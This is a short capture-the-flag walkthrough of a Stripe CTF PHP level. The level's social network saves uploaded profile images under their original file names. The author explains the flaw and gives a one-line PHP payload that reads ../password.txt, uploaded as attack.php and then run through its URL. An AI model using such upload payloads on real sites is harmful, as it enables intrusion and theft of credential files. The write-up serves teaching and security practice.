This is another PHP level where they emulate a little social network where you can upload a image of to use for your profile. This level goes into what is wrong if you don’t force an output file type for uploaded content.
The hint really is that you can upload a file to use as an image.
The problem in the code is really how they handle the upload. They just take a file and move it into the uploads/ directory and keep the name of the file you uploaded. Generally if you accept images, you’d want to convert anything uploaded into a jpeg.
So this is a pretty simple one. Create a file called like attack.php with the following contents in it.
<?php echo file_get_contents(“../password.txt”);
So that will put the file in uploads/attack.php so you can fire up your browser and hit the following page
https://level02-4.stripe-ctf.com/user-cnfowzkbbk/uploads/attack.php
It will spit out the contents of password.txt.